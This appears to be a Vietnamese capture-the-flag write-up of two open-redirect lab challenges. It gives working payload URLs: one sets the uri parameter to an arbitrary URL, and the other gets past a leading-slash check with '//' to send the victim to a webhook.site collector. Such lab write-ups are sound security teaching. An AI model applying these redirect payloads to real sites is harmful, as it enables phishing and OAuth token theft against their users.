Open Redirect 01
Lỗ hổng Open Redirect cho phép bạn chuyển hướng nạn nhân đến một trang web độc hại. Chúng là những lỗ hổng có tác động thấp trong hầu hết các trường hợp trừ khi bạn có thể sử dụng chúng để làm rò rỉ mã thông báo Oauth.
Trong thử thách này, bạn có thể chuyển hướng nạn nhân đến trang web mà bạn kiểm soát (hoặc webhook.site). Khi nạn nhân truy cập trang của bạn, bạn sẽ nhận được chìa khóa để ghi điểm trong Tác nhân người dùng. Sau đó, bạn có thể gửi chìa khóa.
Đây là một openredirect tầm thường, bạn có thể đặt bất kỳ URL nào để đưa nạn nhân đến trang web của bạn.
|
1 |
http://ptl-d23d3546-b69bfa5f.libcurl.st/redirect.php?uri=/ |
Open Redirect 02
Trong thử thách này, URL chuyển hướng cần bắt đầu bằng /. Nhà phát triển đã đưa ra giả định rằng chỉ một đường dẫn / URI mới có thể bắt đầu bằng /. Tuy nhiên, có thể bỏ qua cơ chế này bằng cách sử dụng //. Đối với thử thách này, bạn có thể muốn sử dụng một trang web khác không phải webhook.site vì chúng không tự động chuyển hướng http: // thành https: //. Nếu không, bạn có thể sử dụng URL https: // cho bài tập này.
|
1 |
http://ptl-004847aa-c6ed729b.libcurl.st/redirect.php?uri=//webhook.site/4b21bd88-32a3-404e-8dc3-1366ba0a832b |
8 giờ ago
